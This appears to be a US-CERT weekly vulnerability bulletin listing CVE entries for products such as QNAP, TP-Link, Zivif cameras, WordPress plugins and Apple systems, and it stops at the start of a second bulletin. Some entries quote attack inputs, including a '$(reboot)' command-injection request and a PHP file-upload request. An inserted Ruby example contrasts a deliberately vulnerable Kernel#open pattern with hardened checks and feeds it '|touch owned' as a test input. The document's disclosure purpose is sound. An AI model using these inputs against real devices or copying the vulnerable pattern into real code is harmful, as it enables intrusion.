admin/configuration.php in Piwigo 2.9.2 has CSRF.2017-12-19not yet calculatedCVE-2017-17774
MISC
MISC
puppet -- puppet_enterprise
 
Puppet Enterprise 3.7.x and 3.8.0 might allow remote authenticated users to manage certificates for arbitrary nodes by leveraging a client certificate trusted by the master, aka a "Certificate Authority Reverse Proxy Vulnerability."2017-12-21not yet calculatedCVE-2015-4100
CONFIRM
puppet -- puppetlabs-mysql
 
puppetlabs-mysql 3.1.0 through 3.6.0 allow remote attackers to bypass authentication by leveraging creation of a database account without a password when a 'mysql_user' user parameter contains a host with a netmask.2017-12-21not yet calculatedCVE-2015-7224
CONFIRM
qnap -- qtsA buffer overflow vulnerability in password function in QNAP QTS version 4.2.6 build 20171026, 4.3.3.0378 build 20171117, 4.3.4.0387 (Beta 2) build 20171116 and earlier could allow remote attackers to execute arbitrary code on NAS devices.2017-12-21not yet calculatedCVE-2017-17031
CONFIRM
qnap -- qts
 
A buffer overflow vulnerability in password function in QNAP QTS version 4.2.6 build 20171026, 4.3.3.0378 build 20171117, 4.3.4.0387 (Beta 2) build 20171116 and earlier could allow remote attackers to execute arbitrary code on NAS devices.2017-12-21not yet calculatedCVE-2017-17033
CONFIRM
qnap -- qts
 
A buffer overflow vulnerability in login function in QNAP QTS version 4.2.6 build 20171026, 4.3.3.0378 build 20171117, 4.3.4.0387 (Beta 2) build 20171116 and earlier could allow remote attackers to execute arbitrary code on NAS devices.2017-12-21not yet calculatedCVE-2017-17030
CONFIRM
qnap -- qts
 
A buffer overflow vulnerability in external device function in QNAP QTS version 4.2.6 build 20171026, 4.3.3.0378 build 20171117, 4.3.4.0387 (Beta 2) build 20171116 and earlier could allow remote attackers to execute arbitrary code on NAS devices.2017-12-21not yet calculatedCVE-2017-17028
CONFIRM
qnap -- qts
 
A buffer overflow vulnerability in FTP service in QNAP QTS version 4.2.6 build 20171026, 4.3.3.0378 build 20171117, 4.3.4.0387 (Beta 2) build 20171116 and earlier could allow remote attackers to execute arbitrary code on NAS devices.2017-12-21not yet calculatedCVE-2017-17027
CONFIRM
qnap -- qts
 
A buffer overflow vulnerability in password function in QNAP QTS version 4.2.6 build 20171026, 4.3.3.0378 build 20171117, 4.3.4.0387 (Beta 2) build 20171116 and earlier could allow remote attackers to execute arbitrary code on NAS devices.2017-12-21not yet calculatedCVE-2017-17032
CONFIRM
qnap -- qts
 
A buffer overflow vulnerability in login function in QNAP QTS version 4.2.6 build 20171026, 4.3.3.0378 build 20171117, 4.3.4.0387 (Beta 2) build 20171116 and earlier could allow remote attackers to execute arbitrary code on NAS devices.2017-12-21not yet calculatedCVE-2017-17029
CONFIRM
rados -- gateway
 
RADOS Gateway in Ceph 12.1.0 through 12.2.1 allows remote authenticated users to cause a denial of service (assertion failure and application exit) by leveraging "full" (not necessarily admin) privileges to post an invalid profile to the admin API, related to rgw/rgw_iam_policy.cc, rgw/rgw_basic_types.h, and rgw/rgw_iam_types.h.2017-12-20not yet calculatedCVE-2017-16818
CONFIRM
CONFIRM
FEDORA
rockwell_automation -- factorytalk_alarms_and_events
 
An Improper Input Validation issue was discovered in Rockwell Automation FactoryTalk Alarms and Events, Version 2.90 and earlier. An unauthenticated attacker with remote access to a network with FactoryTalk Alarms and Events can send a specially crafted set of packets packet to Port 403/TCP (the history archiver service), causing the service to either stall or terminate.2017-12-22not yet calculatedCVE-2017-14022
BID
MISC
ruby -- ruby
 
Ruby before 2.4.3 allows Net::FTP command injection. Net::FTP#get, getbinaryfile, gettextfile, put, putbinaryfile, and puttextfile use Kernel#open to open a local file. If the localfile argument starts with the "|" pipe character, the command following the pipe character is executed. The default value of localfile is File.basename(remotefile), so malicious FTP servers could cause arbitrary command execution.2017-12-15not yet calculatedCVE-2017-17405
BID
CONFIRM
CONFIRM
ruby -- ruby
 
The Net::LDAP (aka net-ldap) gem before 0.16.0 for Ruby has Missing SSL Certificate Validation.2017-12-17not yet calculatedCVE-2017-17718
MISC
MISC
MISC
ruby -- ruby
 
The lazy_initialize function in lib/resolv.rb in Ruby through 2.4.3 uses Kernel#open, which might allow Command Injection attacks, as demonstrated by a Resolv::Hosts::new argument beginning with a '|' character, a different vulnerability than CVE-2017-17405. NOTE: situations with untrusted input may be highly unlikely.2017-12-20not yet calculatedCVE-2017-17790
CONFIRM
samsung -- internet_browser
 
Samsung Internet Browser 5.4.02.3 allows remote attackers to bypass the Same Origin Policy and obtain sensitive information via crafted JavaScript code.2017-12-21not yet calculatedCVE-2017-17692
MISC
MISC
softonic -- telegram_messenger_app
 
The saveFile method in MediaController.java in the Telegram Messenger application before 2017-12-08 for Android allows directory traversal via a pathname obtained in a file-transfer request from a remote peer, as demonstrated by writing to tgnet.dat or tgnet.dat.bak.2017-12-16not yet calculatedCVE-2017-17715
MISC
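The two Ruby entries above (CVE-2017-17405, CVE-2017-17790) and the Telegram entry share a root cause: a file name chosen by the other end of a connection is handed to a file-opening API without being checked. The following is an added example, not code from Ruby's Net::FTP or resolv.rb and not from Telegram; the function names (vulnerable_fetch, safe_local_name, resolve_inside, safe_fetch) and the sample names are this example's own. It shows the vulnerable Kernel#open shape beside a hardened version, and a containment check for the case where the peer is allowed to name a relative path with subdirectories.

```ruby
require "tmpdir"

# Added example; not code from Ruby's Net::FTP, resolv.rb, or Telegram.
# Two ways a file name taken from a remote peer goes wrong:
#   1. Kernel#open runs a command when the name starts with "|"
#      (the Net::FTP and Resolv::Hosts entries), and
#   2. a name containing ".." or an absolute path lands outside the
#      directory the file was meant for (the Telegram saveFile entry).

# Mirrors the vulnerable shape of Net::FTP#get: the local name defaults
# to the basename of the remote name and Kernel#open is called on it.
# A remote name of "|touch owned" makes Kernel#open run `touch owned`
# instead of opening a file. Kept for illustration only; nothing below
# calls it.
def vulnerable_fetch(remote_name, payload)
  local = File.basename(remote_name)
  open(local, "w") { |f| f.write(payload) }
  local
end

class UnsafeFileName < StandardError; end

# Reduce the remote name to a single path component and refuse anything
# that is not a plain file name. File.open (used below) never interprets
# a leading "|", so it alone closes the command-execution hole; rejecting
# the name as well makes an attempt visible instead of silently creating
# a file literally called "|touch owned".
def safe_local_name(remote_name)
  local = File.basename(remote_name.to_s)
  raise UnsafeFileName, remote_name if local.empty? || local == "." || local == ".."
  raise UnsafeFileName, remote_name if local.start_with?("|")
  local
end

# For a peer-supplied relative path (subdirectories allowed), resolve it
# against the download directory and insist the result stays inside it.
# File.expand_path collapses ".." lexically and returns an absolute input
# unchanged, so both escape routes fail the prefix check. The check is
# lexical: it does not follow symlinks already present under the directory.
def resolve_inside(download_dir, peer_path)
  base = File.expand_path(download_dir)
  candidate = File.expand_path(peer_path.to_s, base)
  raise UnsafeFileName, peer_path unless candidate.start_with?(base + File::SEPARATOR)
  candidate
end

# Hardened counterpart of vulnerable_fetch: a fixed destination directory,
# a validated single-component name, and File.open instead of Kernel#open.
def safe_fetch(download_dir, remote_name, payload)
  path = File.join(File.expand_path(download_dir), safe_local_name(remote_name))
  File.open(path, "w") { |f| f.write(payload) }
  path
end

if __FILE__ == $0
  Dir.mktmpdir do |dir|
    puts "saved: #{safe_fetch(dir, "/pub/report.txt", "hello")}"
    ["|touch owned", "/pub/|touch owned", ".."].each do |name|
      safe_fetch(dir, name, "x")
    rescue UnsafeFileName => e
      puts "rejected remote name: #{e.message}"
    end
    ["photos/cat.jpg", "../tgnet.dat", "/data/tgnet.dat.bak"].each do |rel|
      puts "inside: #{resolve_inside(dir, rel)}"
    rescue UnsafeFileName => e
      puts "rejected peer path: #{e.message}"
    end
  end
end
```

The Resolv::Hosts case is the same fix: pass the host-file name to File.open rather than Kernel#open. If the download directory can already contain attacker-created symlinks, pair the lexical check with File.realpath on the parent directory before writing.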
solarwinds -- multiple_products
 
SQL injection vulnerability in the LoginServlet page in SolarWinds Storage Manager before 5.1.2, SolarWinds Storage Profiler before 5.1.2, and SolarWinds Backup Profiler before 5.1.2 allows remote attackers to execute arbitrary SQL commands via the loginName field.2017-12-20not yet calculatedCVE-2012-2576
EXPLOIT-DB
EXPLOIT-DB
BID
CONFIRM
XF
sonatype -- nexus_repository_manager
 
Sonatype Nexus Repository Manager through 2.14.5 has weak password encryption with a hardcoded CMMDwoV value in the LDAP integration feature.2017-12-17not yet calculatedCVE-2017-17717
MISC
sony -- music_center_for_pc
 
Untrusted search path vulnerability in Music Center for PC version 1.0.01 and earlier allows an attacker to gain privileges via a Trojan horse DLL in an unspecified directory.2017-12-22not yet calculatedCVE-2017-10909
JVN
spiqe_software -- onethird_cms_show_off
 
Directory traversal vulnerability in OneThird CMS Show Off v1.85 and earlier. Show Off v1.85 en and earlier allows an attacker to read arbitrary files via unspecified vectors.2017-12-22not yet calculatedCVE-2017-10907
JVN
CONFIRM
superbeam -- superbeam
 
SuperBeam through 4.1.3, when using the LAN or WiFi Direct Share feature, does not use HTTPS or any integrity-protection mechanism for file transfer, which makes it easier for remote attackers to send crafted files, as demonstrated by APK injection.2017-12-19not yet calculatedCVE-2017-17763
MISC
symantec -- messaging_gateway
 
Prior to 10.6.4, Symantec Messaging Gateway may be susceptible to a path traversal attack (also known as directory traversal). These types of attacks aim to access files and directories that are stored outside the web root folder. By manipulating variables, it may be possible to access arbitrary files and directories stored on the file system including application source code or configuration and critical system files.2017-12-20not yet calculatedCVE-2017-15532
BID
CONFIRM
syncbreeze -- syncbreeze
 
The Enterprise version of SyncBreeze 10.2.12 and earlier is affected by a Remote Denial of Service vulnerability. The web server does not check bounds when reading server requests in the Host header on making a connection, resulting in a classic Buffer Overflow that causes a Denial of Service.2017-12-19not yet calculatedCVE-2017-17088
MISC
FULLDISC
EXPLOIT-DB
synology -- diskstation_manager
 
An improper access control vulnerability in synodsmnotify in Synology DiskStation Manager (DSM) before 6.1.4-15217 and before 6.0.3-8754-6 allows local users to inject arbitrary web script or HTML via the -fn option.2017-12-22not yet calculatedCVE-2017-16766
CONFIRM
synology -- photo_station
 
Cross-site scripting (XSS) vulnerability in PixlrEditorHandler.php in Synology Photo Station before 6.8.0-3456 allows remote authenticated users to inject arbitrary web scripts or HTML via the id parameter.2017-12-20not yet calculatedCVE-2017-12072
CONFIRM
tg_soft -- vir.it_explorer_liteIn TG Soft Vir.IT eXplorer Lite 8.5.65, the driver file (VIRAGTLT.SYS) allows local users to cause a denial of service (BSOD) or possibly have unspecified other impact because of not validating input values from IOCtl 0x8273E060.2017-12-20not yet calculatedCVE-2017-17801
MISC
tg_soft -- vir.it_explorer_lite
 
In TG Soft Vir.IT eXplorer Lite 8.5.42, the driver file (VIRAGTLT.SYS) allows local users to cause a denial of service (BSOD) or possibly have unspecified other impact because of not validating input values from IOCtl 0x8273A0A0, a different vulnerability than CVE-2017-17800.2017-12-20not yet calculatedCVE-2017-17798
MISC
tg_soft -- vir.it_explorer_lite
 
In TG Soft Vir.IT eXplorer Lite 8.5.65, the driver file (VIRAGTLT.SYS) allows local users to cause a denial of service (BSOD) or possibly have unspecified other impact because of not validating input values from IOCtl 0x8273E080.2017-12-20not yet calculatedCVE-2017-17802
MISC
tg_soft -- vir.it_explorer_lite
 
In TG Soft Vir.IT eXplorer Lite 8.5.65, the driver file (VIRAGTLT.SYS) allows local users to cause a denial of service (BSOD) or possibly have unspecified other impact because of not validating input values from IOCtl 0x82736068, a different vulnerability than CVE-2017-17475.2017-12-20not yet calculatedCVE-2017-17803
MISC
tg_soft -- vir.it_explorer_lite
 
In TG Soft Vir.IT eXplorer Lite 8.5.65, the driver file (VIRAGTLT.SYS) allows local users to cause a denial of service (BSOD) or possibly have unspecified other impact because of not validating input values from IOCtl 0x82730068.2017-12-20not yet calculatedCVE-2017-17799
MISC
tg_soft -- vir.it_explorer_lite
 
In TG Soft Vir.IT eXplorer Lite 8.5.65, the driver file (VIRAGTLT.SYS) allows local users to cause a denial of service (BSOD) or possibly have unspecified other impact because of not validating input values from IOCtl 0x827300A4.2017-12-20not yet calculatedCVE-2017-17796
MISC
tg_soft -- vir.it_explorer_lite
 
In TG Soft Vir.IT eXplorer Lite 8.5.65, the driver file (VIRAGTLT.SYS) allows local users to cause a denial of service (BSOD) or possibly have unspecified other impact because of not validating input values from IOCtl 0x8273A0A0, a different vulnerability than CVE-2017-17798.2017-12-20not yet calculatedCVE-2017-17800
MISC
tp-link -- multiple_products
 
TP-Link TL-WVR and TL-WAR devices allow remote authenticated users to execute arbitrary commands via shell metacharacters in the interface field of an admin/wportal command to cgi-bin/luci, related to the get_device_byif function in /usr/lib/lua/luci/controller/admin/wportal.lua in uhttpd.2017-12-19not yet calculatedCVE-2017-17757
MISC
tp-link -- multiple_products
 
TP-Link TL-WVR and TL-WAR devices allow remote authenticated users to execute arbitrary commands via shell metacharacters in the interface field of an admin/dhcps command to cgi-bin/luci, related to the zone_get_iface_bydev function in /usr/lib/lua/luci/controller/admin/dhcps.lua in uhttpd.2017-12-19not yet calculatedCVE-2017-17758
MISC
tp-link -- tl-sg108e_device
 
Weak access control methods on the TP-Link TL-SG108E 1.0.0 allow any user on a NAT network with an authenticated administrator to access the device without entering user credentials. The authentication record is stored on the device; thus if an administrator authenticates from a NAT network, the authentication applies to the IP address of the NAT gateway, and any user behind that NAT gateway is also treated as authenticated.2017-12-20not yet calculatedCVE-2017-17746
FULLDISC
tp-link -- tl-sg108e_device
 
Cross-site scripting (XSS) vulnerability in system_name_set.cgi in TP-Link TL-SG108E 1.0.0 allows authenticated remote attackers to submit arbitrary java script via the 'sysName' parameter.2017-12-20not yet calculatedCVE-2017-17745
FULLDISC
tp-link -- tl-sg108e_device
 
Weak access controls in the Device Logout functionality on the TP-Link TL-SG108E v1.0.0 allow remote attackers to call the logout functionality, triggering a denial of service condition.2017-12-20not yet calculatedCVE-2017-17747
FULLDISC
trape -- trape
 
Trape before 2017-11-05 has XSS via the /nr red parameter, the /nr vId parameter, the /register User-Agent HTTP header, the /register country parameter, the /register countryCode parameter, the /register cpu parameter, the /register isp parameter, the /register lat parameter, the /register lon parameter, the /register org parameter, the /register query parameter, the /register region parameter, the /register regionName parameter, the /register timezone parameter, the /register vId parameter, the /register zip parameter, or the /tping id parameter.2017-12-16not yet calculatedCVE-2017-17714
MISC
MISC
MISC
trape -- trape
 
Trape before 2017-11-05 has SQL injection via the /nr red parameter, the /nr vId parameter, the /register User-Agent HTTP header, the /register country parameter, the /register countryCode parameter, the /register cpu parameter, the /register isp parameter, the /register lat parameter, the /register lon parameter, the /register org parameter, the /register query parameter, the /register region parameter, the /register regionName parameter, the /register timezone parameter, the /register vId parameter, the /register zip parameter, or the /tping id parameter.2017-12-16not yet calculatedCVE-2017-17713
MISC
MISC
MISC
MISC
MISC
urbackup -- urbackup_server
 
Cross - site scripting (XSS) vulnerability in UrBackup Server before 2.1.20 allows remote attackers to inject arbitrary web script or HTML via the action parameter.2017-12-17not yet calculatedCVE-2017-16950
CONFIRM
CONFIRM
videolan -- vlc
 
In VideoLAN VLC media player through 2.2.8, there is a type conversion vulnerability in modules/demux/mp4/libmp4.c in the MP4 demux module leading to a invalid free, because the type of a box may be changed between a read operation and a free operation.2017-12-15not yet calculatedCVE-2017-17670
MISC
BID
vmware -- esxi__and_workstation_and_fusion
 
VMware ESXi (6.5 before ESXi650-201710401-BG), Workstation (12.x before 12.5.8), and Fusion (8.x before 8.5.9) contain a vulnerability that could allow an authenticated VNC session to cause a heap overflow via a specific set of VNC packets resulting in heap corruption. Successful exploitation of this issue could result in remote code execution in a virtual machine via the authenticated VNC session. Note: In order for exploitation to be possible in ESXi, VNC must be manually enabled in a virtual machine's .vmx configuration file. In addition, ESXi must be configured to allow VNC traffic through the built-in firewall.2017-12-20not yet calculatedCVE-2017-4933
CONFIRM
vmware -- esxi__and_workstation_and_fusion
 
VMware ESXi (6.0 before ESXi600-201711101-SG, 5.5 ESXi550-201709101-SG), Workstation (12.x before 12.5.8), and Fusion (8.x before 8.5.9) contain a vulnerability that could allow an authenticated VNC session to cause a stack overflow via a specific set of VNC packets. Successful exploitation of this issue could result in remote code execution in a virtual machine via the authenticated VNC session. Note: In order for exploitation to be possible in ESXi, VNC must be manually enabled in a virtual machine's .vmx configuration file. In addition, ESXi must be configured to allow VNC traffic through the built-in firewall.2017-12-20not yet calculatedCVE-2017-4941
CONFIRM
vmware -- esxi
 
The ESXi Host Client in VMware ESXi (6.5 before ESXi650-201712103-SG, 5.5 before ESXi600-201711103-SG and 5.5 before ESXi550-201709102-SG) contains a vulnerability that may allow for stored cross-site scripting (XSS). An attacker can exploit this vulnerability by injecting Javascript, which might get executed when other users access the Host Client.2017-12-20not yet calculatedCVE-2017-4940
CONFIRM
vmware -- vcenter_server_appliance
 
VMware vCenter Server Appliance (vCSA) (6.5 before 6.5 U1d) contains a local privilege escalation vulnerability via the 'showlog' plugin. Successful exploitation of this issue could result in a low privileged user gaining root level privileges over the appliance base OS.2017-12-20not yet calculatedCVE-2017-4943
CONFIRM
webkit -- webkit
 
WTF/wtf/FastBitVector.h in WebKit, as distributed in Safari Technology Preview Release 46, allows remote attackers to cause a denial of service (buffer overflow) or possibly have unspecified other impact because it calls the FastBitVectorWordOwner::resizeSlow function (in WTF/wtf/FastBitVector.cpp) for a purpose other than initializing a bitvector size, and resizeSlow mishandles cases where the old array length is greater than the new array length.2017-12-20not yet calculatedCVE-2017-17821
MISC
MISC
wecon -- levistudio_hmi_editor
 
A Heap-based Buffer Overflow issue was discovered in WECON LeviStudio HMI. The heap-based buffer overflow vulnerability has been identified, which may allow remote code execution.2017-12-20not yet calculatedCVE-2017-16717
MISC
wordpress -- wordpress
 
An issue was discovered in the AccessKeys AccessPress Anonymous Post Pro plugin through 3.1.9 for WordPress. Improper input sanitization allows the attacker to override the settings for allowed file extensions and upload file size, related to inc/cores/file-uploader.php and file-uploader/file-uploader-class.php. This allows the attacker to upload anything they want to the server, as demonstrated by an action=ap_file_upload_action&allowedExtensions[]=php request to /wp-admin/admin-ajax.php that results in a .php file upload and resultant PHP code execution.2017-12-18not yet calculatedCVE-2017-16949
MISC
MISC
EXPLOIT-DB
wordpress -- wordpress
 
Multiple cross-site scripting (XSS) vulnerabilities in ui_stats.php in the bSuite plugin before 5 alpha 3 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) s or (2) p parameters to index.php.2017-12-20not yet calculatedCVE-2011-4955
CONFIRM
SECUNIA
CONFIRM
MLIST
MLIST
XF
wordpress -- wordpress
 
Multiple cross-site scripting (XSS) vulnerabilities in the esb-csv-import-export plugin through 1.1 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) cie_type, (2) cie_import, (3) cie_update, or (4) cie_ignore parameter to includes/admin/views/esb-cie-import-export-page.php.2017-12-19not yet calculatedCVE-2017-17753
MISC
wordpress -- wordpress
 
The Clockwork SMS clockwork-test-message.php component has XSS via a crafted "to" parameter in a clockwork-test-message request to wp-admin/admin.php. This component code is found in the following WordPress plugins: Clockwork Free and Paid SMS Notifications 2.0.3, Two-Factor Authentication - Clockwork SMS 1.0.2, Booking Calendar - Clockwork SMS 1.0.5, Contact Form 7 - Clockwork SMS 2.3.0, Fast Secure Contact Form - Clockwork SMS 2.1.2, Formidable - Clockwork SMS 1.0.2, Gravity Forms - Clockwork SMS 2.2, and WP e-Commerce - Clockwork SMS 2.0.5.2017-12-19not yet calculatedCVE-2017-17780
MISC
MISC
wordpress -- wordpress
 
A cross-site scripting (XSS) vulnerability in the custom-map plugin through 1.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the map_id parameter to view/advancedsettings.php.2017-12-19not yet calculatedCVE-2017-17744
MISC
MISC
wordpress -- wordpress
 
A cross-site scripting (XSS) vulnerability in the wp-concours plugin through 1.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the result_message parameter to includes/concours_page.php.
Published: 2017-12-19 | CVSS Score: not yet calculated | CVE-2017-17719
MISC
MISC
www.phpautoclassifiedscript -- bus_booking_script
 
Bus Booking Script has XSS via the results.php datepicker parameter or the admin/new_master.php spemail parameter.
Published: 2017-12-21 | CVSS Score: not yet calculated | CVE-2017-17828
MISC
www.phpautoclassifiedscript -- bus_booking_script
 
Bus Booking Script has SQL Injection via the admin/view_seatseller.php sp_id parameter or the admin/view_member.php memid parameter.
Published: 2017-12-21 | CVSS Score: not yet calculated | CVE-2017-17829
MISC
www.phpautoclassifiedscript -- bus_booking_script
 
Bus Booking Script has CSRF via admin/new_master.php.
Published: 2017-12-21 | CVSS Score: not yet calculated | CVE-2017-17830
MISC
www.phpautoclassifiedscript -- bus_booking_script
 
Bus Booking Script 1.0 has SQL Injection via the txtname parameter to admin/index.php.
Published: 2017-12-18 | CVSS Score: not yet calculated | CVE-2017-17645
MISC
EXPLOIT-DB
xiongmai_technology -- multiple_products
 
A Stack-based Buffer Overflow issue was discovered in Xiongmai Technology IP Cameras and DVRs using the NetSurveillance Web interface. The stack-based buffer overflow vulnerability has been identified, which may allow an attacker to execute code remotely or crash the device. After rebooting, the device restores itself to a more vulnerable state in which Telnet is accessible.
Published: 2017-12-20 | CVSS Score: not yet calculated | CVE-2017-16725
BID
MISC
zivif -- pr115-204-p-rs_camera
 
Zivif PR115-204-P-RS V2.3.4.2103 web cameras contain a hard-coded cat1029 password for the root user. The SONIX operating system's setup renders this password unchangeable and it can be used to access the device via a TELNET session.
Published: 2017-12-18 | CVSS Score: not yet calculated | CVE-2017-17107
MISC
FULLDISC
MISC
zivif -- pr115-204-p-rs_camera
 
Zivif PR115-204-P-RS V2.3.4.2103 web cameras are vulnerable to unauthenticated, blind remote command injection via CGI scripts used as part of the web interface, as demonstrated by a cgi-bin/iptest.cgi?cmd=iptest.cgi&-time="1504225666237"&-url=$(reboot) request.
Published: 2017-12-18 | CVSS Score: not yet calculated | CVE-2017-17105
MISC
FULLDISC
MISC
zivif -- pr115-204-p-rs_camera
 
Credentials for Zivif PR115-204-P-RS V2.3.4.2103 Webcams can be obtained by an unauthenticated remote attacker using a standard web /cgi-bin/hi3510/param.cgi?cmd=getuser HTTP request. This vulnerability exists because of a lack of authentication checks in requests to CGI pages.
Published: 2017-12-18 | CVSS Score: not yet calculated | CVE-2017-17106
MISC
FULLDISC
MISC
zoom -- zoomlauncher
 
Stack-based buffer overflow in the ZoomLauncher binary in the Zoom client for Linux before 2.0.115900.1201 allows remote attackers to execute arbitrary code by leveraging the zoommtg:// scheme handler.
Published: 2017-12-19 | CVSS Score: not yet calculated | CVE-2017-15048
MISC
FULLDISC
MISC
EXPLOIT-DB
zoom -- zoomlauncher
 
The ZoomLauncher binary in the Zoom client for Linux before 2.0.115900.1201 does not properly sanitize user input when constructing a shell command, which allows remote attackers to execute arbitrary code by leveraging the zoommtg:// scheme handler.
Published: 2017-12-19 | CVSS Score: not yet calculated | CVE-2017-15049
MISC
FULLDISC
MISC
EXPLOIT-DB
zuuse_beims -- contractorweb.net
 
CWEBNET/WOSummary/List in ZUUSE BEIMS ContractorWeb .NET 5.18.0.0 allows SQL injection via the tradestatus, assetno, assignto, building, domain, jobtype, site, trade, woType, workorderno, or workorderstatus parameter.
Published: 2017-12-18 | CVSS Score: not yet calculated | CVE-2017-17721
MISC


Mozilla Releases Security Update for Thunderbird

Original release date: December 25, 2017

Mozilla has released a security update to address multiple vulnerabilities in Thunderbird. A remote attacker could exploit some of these vulnerabilities to take control of an affected system.

US-CERT encourages users and administrators to review the Mozilla Security Advisory for Thunderbird 52.5.2 and apply the necessary update.




SB18-001: Vulnerability Summary for the Week of December 25, 2017

Original release date: January 01, 2018

The US-CERT Cyber Security Bulletin provides a summary of new vulnerabilities that have been recorded by the National Institute of Standards and Technology (NIST) National Vulnerability Database (NVD) in the past week. The NVD is sponsored by the Department of Homeland Security (DHS) National Cybersecurity and Communications Integration Center (NCCIC) / United States Computer Emergency Readiness Team (US-CERT). For modified or updated entries, please visit the NVD, which contains historical vulnerability information.

The vulnerabilities are based on the CVE vulnerability naming standard and are organized according to severity, determined by the Common Vulnerability Scoring System (CVSS) standard. The division of high, medium, and low severities correspond to the following scores:

  • High - Vulnerabilities will be labeled High severity if they have a CVSS base score of 7.0 - 10.0

  • Medium - Vulnerabilities will be labeled Medium severity if they have a CVSS base score of 4.0 - 6.9

  • Low - Vulnerabilities will be labeled Low severity if they have a CVSS base score of 0.0 - 3.9

Entries may include additional information provided by organizations and efforts sponsored by US-CERT. This information may include identifying information, values, definitions, and related links. Patch information is provided when available. Please note that some of the information in the bulletins is compiled from external, open source reports and is not a direct result of US-CERT analysis.

 

High Vulnerabilities

Primary
Vendor -- Product
Description | Published | CVSS Score | Source & Patch Info
apple -- apple_tv
An issue was discovered in certain Apple products. iOS before 11.2 is affected. tvOS before 11.2 is affected. watchOS before 4.2 is affected. The issue involves the "IOSurface" component. It allows attackers to execute arbitrary code in a privileged context or cause a denial of service (memory corruption) via a crafted app.
Published: 2017-12-25 | CVSS Score: 9.3 | CVE-2017-13861
BID
SECTRACK
SECTRACK
CONFIRM
CONFIRM
CONFIRM
EXPLOIT-DB
apple -- apple_tv
An issue was discovered in certain Apple products. iOS before 11.2 is affected. macOS before 10.13.2 is affected. tvOS before 11.2 is affected. watchOS before 4.2 is affected. The issue involves the "Kernel" component. It allows attackers to execute arbitrary code in a privileged context or cause a denial of service (memory corruption) via a crafted app.
Published: 2017-12-25 | CVSS Score: 9.3 | CVE-2017-13862
BID
SECTRACK
SECTRACK
SECTRACK
CONFIRM
CONFIRM
CONFIRM
CONFIRM
apple -- apple_tv
An issue was discovered in certain Apple products. iOS before 11.2 is affected. macOS before 10.13.2 is affected. tvOS before 11.2 is affected. watchOS before 4.2 is affected. The issue involves the "Kernel" component. It allows attackers to execute arbitrary code in a privileged context or cause a denial of service (memory corruption) via a crafted app.
Published: 2017-12-25 | CVSS Score: 9.3 | CVE-2017-13867
BID
SECTRACK
SECTRACK
SECTRACK
CONFIRM
CONFIRM
CONFIRM
CONFIRM
EXPLOIT-DB
apple -- apple_tv
An issue was discovered in certain Apple products. iOS before 11.2 is affected. macOS before 10.13.2 is affected. tvOS before 11.2 is affected. watchOS before 4.2 is affected. The issue involves the "Kernel" component. It allows attackers to execute arbitrary code in a privileged context or cause a denial of service (memory corruption) via a crafted app.
Published: 2017-12-25 | CVSS Score: 9.3 | CVE-2017-13876
BID
SECTRACK
SECTRACK
SECTRACK
CONFIRM
CONFIRM
CONFIRM
CONFIRM
EXPLOIT-DB
apple -- apple_tv
An issue was discovered in certain Apple products. iOS before 11.2 is affected. macOS before 10.13.2 is affected. tvOS before 11.2 is affected. watchOS before 4.2 is affected. The issue involves the "IOKit" component. It allows attackers to execute arbitrary code in a privileged context or cause a denial of service (memory corruption) via a crafted app.
Published: 2017-12-27 | CVSS Score: 9.3 | CVE-2017-7162
CONFIRM
CONFIRM
CONFIRM
CONFIRM
apple -- iphone_os
An issue was discovered in certain Apple products. iOS before 11.2 is affected. macOS before 10.13.2 is affected. The issue involves the "IOKit" component. It allows attackers to execute arbitrary code in a privileged context or cause a denial of service (memory corruption) via a crafted app.
Published: 2017-12-25 | CVSS Score: 9.3 | CVE-2017-13847
BID
SECTRACK
SECTRACK
CONFIRM
CONFIRM
EXPLOIT-DB
apple -- iphone_os
An issue was discovered in certain Apple products. iOS before 11.2 is affected. The issue involves the "IOMobileFrameBuffer" component. It allows attackers to execute arbitrary code in a privileged context or cause a denial of service (memory corruption) via a crafted app.
Published: 2017-12-25 | CVSS Score: 9.3 | CVE-2017-13879
BID
SECTRACK
CONFIRM
apple -- mac_os_x
An issue was discovered in certain Apple products. macOS before 10.13.2 is affected. The issue involves the "IOKit" component. It allows attackers to execute arbitrary code in a privileged context via a crafted app.
Published: 2017-12-25 | CVSS Score: 9.3 | CVE-2017-13848
BID
SECTRACK
CONFIRM
apple -- mac_os_x
An issue was discovered in certain Apple products. macOS before 10.13.2 is affected. The issue involves the "IOKit" component. It allows attackers to execute arbitrary code in a privileged context via a crafted app.
Published: 2017-12-25 | CVSS Score: 9.3 | CVE-2017-13858
BID
SECTRACK
CONFIRM
apple -- mac_os_x
An issue was discovered in certain Apple products. macOS before 10.13.2 is affected. The issue involves the "Intel Graphics Driver" component. It allows attackers to execute arbitrary code in a privileged context or cause a denial of service (out-of-bounds read) via a crafted app.
Published: 2017-12-25 | CVSS Score: 9.3 | CVE-2017-13875
BID
SECTRACK
CONFIRM
EXPLOIT-DB
apple -- mac_os_x
An issue was discovered in certain Apple products. macOS before 10.13.2 is affected. The issue involves the "Intel Graphics Driver" component. It allows attackers to execute arbitrary code in a privileged context or cause a denial of service (memory corruption) via a crafted app.
Published: 2017-12-25 | CVSS Score: 9.3 | CVE-2017-13883
BID
SECTRACK
CONFIRM
apple -- mac_os_x
An issue was discovered in certain Apple products. macOS before 10.13.2 is affected. The issue involves the "Intel Graphics Driver" component. It allows attackers to execute arbitrary code in a privileged context or cause a denial of service (memory corruption) via a crafted app.
Published: 2017-12-27 | CVSS Score: 9.3 | CVE-2017-7155
CONFIRM
apple -- mac_os_x
An issue was discovered in certain Apple products. macOS before 10.13.2 is affected. The issue involves the "IOAcceleratorFamily" component. It allows attackers to execute arbitrary code in a privileged context or cause a denial of service (memory corruption) via a crafted app.
Published: 2017-12-27 | CVSS Score: 9.3 | CVE-2017-7159
CONFIRM
apple -- mac_os_x
An issue was discovered in certain Apple products. macOS before 10.13.2 is affected. The issue involves the "Intel Graphics Driver" component. It allows attackers to execute arbitrary code in a privileged context or cause a denial of service (memory corruption) via a crafted app.
Published: 2017-12-27 | CVSS Score: 9.3 | CVE-2017-7163
CONFIRM
imagemagick -- imagemagick
In ImageMagick 7.0.7-16 Q16, a vulnerability was found in the function ReadOnePNGImage in coders/png.c, which allows attackers to cause a denial of service (ReadOneMNGImage large loop) via a crafted mng image file.
Published: 2017-12-27 | CVSS Score: 7.1 | CVE-2017-17914
CONFIRM

 

Medium Vulnerabilities

Primary
Vendor -- Product
